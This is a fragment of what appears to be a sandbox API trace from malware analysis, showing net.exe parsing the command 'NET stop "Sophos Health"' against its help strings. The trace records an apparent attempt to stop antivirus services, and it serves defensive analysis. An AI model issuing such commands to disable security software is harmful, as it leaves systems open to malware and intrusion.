Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x15 [0043.351] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET START MESSENGER\r\n", _MaxCount=0x19) returned 14 [0043.351] LocalFree (hMem=0x435638) returned 0x0 [0043.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x15 [0043.351] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET START NET LOGON\r\n", _MaxCount=0x19) returned 14 [0043.351] LocalFree (hMem=0x435638) returned 0x0 [0043.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x16 [0043.351] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x19) returned 14 [0043.351] LocalFree (hMem=0x435638) returned 0x0 [0043.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x11 [0043.351] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET START RPCSS\r\n", _MaxCount=0x19) returned 14 [0043.351] LocalFree (hMem=0x435638) returned 0x0 [0043.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x14 [0043.351] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET START SCHEDULE\r\n", _MaxCount=0x19) returned 14 [0043.351] LocalFree (hMem=0x435638) returned 0x0 [0043.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x12 [0043.351] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET START SERVER\r\n", _MaxCount=0x19) returned 14 [0043.351] LocalFree (hMem=0x435638) returned 0x0 [0043.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xf [0043.351] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET START UPS\r\n", _MaxCount=0x19) returned 14 [0043.351] LocalFree (hMem=0x435638) returned 0x0 [0043.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x17 [0043.351] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET START WORKSTATION\r\n", _MaxCount=0x19) returned 14 [0043.351] LocalFree (hMem=0x435638) returned 0x0 [0043.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x18 [0043.351] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x19) returned 14 [0043.351] LocalFree (hMem=0x435638) returned 0x0 [0043.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x2a [0043.351] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET STATISTICS\r\n[WORKSTAT", _MaxCount=0x19) returned 14 [0043.351] LocalFree (hMem=0x435638) returned 0x0 [0043.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x15 [0043.351] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x19) returned 19 [0043.351] LocalFree (hMem=0x435638) returned 0x0 [0043.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x58 [0043.351] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET TIME\r\n\r\n[\\\\computerna", _MaxCount=0x19) returned -1 [0043.351] LocalFree (hMem=0x435638) returned 0x0 [0043.351] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x184 [0043.351] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET USE\r\n[devicename | *]", _MaxCount=0x19) returned -2 [0043.352] LocalFree (hMem=0x435638) returned 0x0 [0043.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xc7 [0043.352] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET USER\r\n[username [pass", _MaxCount=0x19) returned -2 [0043.352] LocalFree (hMem=0x435638) returned 0x0 [0043.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x47 [0043.352] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET VIEW\r\n[\\\\computername", _MaxCount=0x19) returned -3 [0043.352] LocalFree (hMem=0x435638) returned 0x0 [0043.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xc2 [0043.352] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NET\r\n [ ACCOUNTS | COM", _MaxCount=0x19) returned 19 [0043.352] LocalFree (hMem=0x435638) returned 0x0 [0043.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x319 [0043.352] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="SERVICES\r\nNET START can b", _MaxCount=0x19) returned -5 [0043.352] LocalFree (hMem=0x435638) returned 0x0 [0043.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x483 [0043.352] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="SYNTAX\r\nThe following con", _MaxCount=0x19) returned -5 [0043.352] LocalFree (hMem=0x435638) returned 0x0 [0043.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xa86 [0043.352] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="NAMES\r\nThe following type", _MaxCount=0x19) returned 4 [0043.352] LocalFree (hMem=0x435638) returned 0x0 [0043.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x54 [0043.352] _wcsnicmp (_String1="NET stop ΓÇ£Sophos Health", _String2="\r\nFor more information on", _MaxCount=0x19) returned 97 [0043.352] LocalFree (hMem=0x435638) returned 0x0 [0043.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xad [0043.352] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0043.352] LocalFree (hMem=0x435638) returned 0x0 [0043.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x2e [0043.352] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0043.352] LocalFree (hMem=0x435638) returned 0x0 [0043.352] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x7d [0043.352] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0043.353] LocalFree (hMem=0x435638) returned 0x0 [0043.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x26 [0043.353] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0043.353] LocalFree (hMem=0x435638) returned 0x0 [0043.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x19 [0043.353] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0043.353] LocalFree (hMem=0x435638) returned 0x0 [0043.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x1b [0043.353] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0043.353] LocalFree (hMem=0x435638) returned 0x0 [0043.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xbe [0043.353] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0043.353] LocalFree (hMem=0x435638) returned 0x0 [0043.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x33 [0043.353] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0043.353] LocalFree (hMem=0x435638) returned 0x0 [0043.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x19 [0043.353] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0043.353] LocalFree (hMem=0x435638) returned 0x0 [0043.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0xc1 [0043.353] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0043.353] LocalFree (hMem=0x435638) returned 0x0 [0043.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x16 [0043.353] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0043.353] LocalFree (hMem=0x435638) returned 0x0 [0043.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x33 [0043.353] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0043.353] LocalFree (hMem=0x435638) returned 0x0 [0043.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x234 [0043.353] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0043.353] LocalFree (hMem=0x435638) returned 0x0 [0043.353] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x13 [0043.354] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0043.354] LocalFree (hMem=0x435638) returned 0x0 [0043.354] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x14 [0043.354] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0043.354] LocalFree (hMem=0x435638) returned 0x0 [0043.354] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x14 [0043.354] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0043.354] LocalFree (hMem=0x435638) returned 0x0 [0043.354] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="嘸C⡋瓢+嘸C+") returned 0x15 [0043.354] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0043.354] LocalFree (hMem=0x435638) returned 0x0 [0043.354] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="瘸C⡋瓢+嘸C+") returned 0x15 [0043.354] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0043.354] LocalFree (hMem=0x437638) returned 0x0 [0043.354] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+瘸C+") returned 0x16 [0043.354] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0043.354] LocalFree (hMem=0x439638) returned 0x0 [0043.354] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x11 [0043.354] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0043.354] LocalFree (hMem=0x439638) returned 0x0 [0043.354] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x14 [0043.354] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0043.354] LocalFree (hMem=0x439638) returned 0x0 [0043.354] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x12 [0043.354] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0043.354] LocalFree (hMem=0x439638) returned 0x0 [0043.354] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0xf [0043.354] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0043.355] LocalFree (hMem=0x439638) returned 0x0 [0043.355] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x17 [0043.355] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0043.367] LocalFree (hMem=0x439638) returned 0x0 [0043.374] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x18 [0043.375] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0043.378] LocalFree (hMem=0x439638) returned 0x0 [0043.382] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x2a [0043.390] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0043.394] LocalFree (hMem=0x439638) returned 0x0 [0043.394] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x15 [0043.394] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0043.394] LocalFree (hMem=0x439638) returned 0x0 [0043.394] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x58 [0043.394] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0043.394] LocalFree (hMem=0x439638) returned 0x0 [0043.394] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x184 [0043.394] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0043.394] LocalFree (hMem=0x439638) returned 0x0 [0043.394] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0xc7 [0043.394] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0043.394] LocalFree (hMem=0x439638) returned 0x0 [0043.394] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x47 [0043.394] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0043.394] LocalFree (hMem=0x439638) returned 0x0 [0043.394] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0xc2 [0043.395] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0043.395] LocalFree (hMem=0x439638) returned 0x0 [0043.395] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x319 [0043.395] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0043.395] LocalFree (hMem=0x439638) returned 0x0 [0043.395] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x483 [0043.395] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0043.395] LocalFree (hMem=0x439638) returned 0x0 [0043.395] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0xa86 [0043.395] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0043.395] LocalFree (hMem=0x439638) returned 0x0 [0043.395] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x54 [0043.395] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0043.395] LocalFree (hMem=0x439638) returned 0x0 [0043.395] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0xad [0043.395] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0043.395] LocalFree (hMem=0x439638) returned 0x0 [0043.395] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x2e [0043.395] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0043.395] LocalFree (hMem=0x439638) returned 0x0 [0043.395] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x7d [0043.395] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0043.395] LocalFree (hMem=0x439638) returned 0x0 [0043.395] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x26 [0043.395] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0043.396] LocalFree (hMem=0x439638) returned 0x0 [0043.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x19 [0043.396] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0043.396] LocalFree (hMem=0x439638) returned 0x0 [0043.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x1b [0043.396] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0043.396] LocalFree (hMem=0x439638) returned 0x0 [0043.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0xbe [0043.396] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0043.396] LocalFree (hMem=0x439638) returned 0x0 [0043.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x33 [0043.396] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0043.396] LocalFree (hMem=0x439638) returned 0x0 [0043.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2bf2ec, nSize=0x0, Arguments=0x2bf2e8 | out: lpBuffer="阸C⡋瓢+阸C+") returned 0x19 [0043.396] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0043.396] LocalFree (hMem=0x439638) returned 0x0 [0043.396] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc17, dwLanguageId=0x0, 